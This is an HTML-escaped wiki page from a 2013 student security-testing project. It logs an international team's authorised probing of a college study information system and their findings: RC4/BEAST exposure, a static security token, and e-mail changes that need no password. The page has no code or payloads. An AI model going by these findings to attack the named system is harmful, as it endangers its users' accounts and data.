&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive (link will be here soon).&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
Our final documentation can be found from Google Drive.&lt;br /&gt;
[https://docs.google.com/document/d/1ACCHfErxIn1U__bfTr1TTRNRRLJM9F2rZZ9dttgjed8/edit Final Documentation]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;NB! This can be updated in a few hours or so?&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==IP Feedback==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
* &#039;&#039;&#039;What I did like: &#039;&#039;&#039;&lt;br /&gt;
** I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time.&lt;br /&gt;
** Multicultural groups, where all the participants are from different countries.&lt;br /&gt;
** I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.&lt;br /&gt;
** I enjoyed out-of-schedule activities. For example, I liked visiting Skype, TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling &amp;quot;competition&amp;quot; and it was fun!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like: &#039;&#039;&lt;br /&gt;
** I did not like that we had to sit so much in lectures. :) (Wanted to stretch some more)&lt;br /&gt;
** From time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don&#039;t know the purpose yet, but you will find it out in the future.&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in a team on a real-life problem.&lt;br /&gt;
** Practising problem-solving and working as a team.&lt;br /&gt;
** Learned a lot of new stuff.&lt;br /&gt;
** Organisation - well done&lt;br /&gt;
** Had a wonderful team!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** A couple of days short of time - as usual...&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Everything was organized really well.&lt;br /&gt;
** I liked the arranged events like sauna, visiting Skype and Tallinn teletorn.&lt;br /&gt;
** Everything was also free for us except the beer.&lt;br /&gt;
** I met many new interesting people and got to know about their cultures.&lt;br /&gt;
** I got new friends for life.&lt;br /&gt;
** Our project was interesting and i learned new skills.&lt;br /&gt;
** I also liked FREE water, Estonian girls and Americana pizza place.&lt;br /&gt;
** This IP was one of my best experiences ever.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Lack of free time&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** It was nice to meet new people and get new friends from different cultures.&lt;br /&gt;
** Also all the events that was arranged were very funny, specially sauna-event!  &lt;br /&gt;
** Visiting Skype office was something that you don’t get to do everyday!&lt;br /&gt;
** Free food!&lt;br /&gt;
** Everything was well organized and teachers were truly interested about this intensive course!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** First of all, i would like thank you everyone!&lt;br /&gt;
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Not so much free time T.T&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Accommodation&lt;br /&gt;
** The equipment we used&lt;br /&gt;
** The capabilities and expertise of the professors&lt;br /&gt;
** The overall quality of teaching&lt;br /&gt;
** The expected learning outcomes&lt;br /&gt;
** The activities besides the general course&lt;br /&gt;
** Friendly environment&lt;br /&gt;
** Working in teams. Thanks guys!&lt;br /&gt;
** Free water&lt;br /&gt;
** Tasty food&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** To long working hours&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in teams.&lt;br /&gt;
** Meeting new people.&lt;br /&gt;
** Seeing new places.&lt;br /&gt;
** Learning new things.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
** Brainstorming after whole day of lectures.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62418</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62418"/>
		<updated>2013-04-05T09:03:15Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Final documentation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
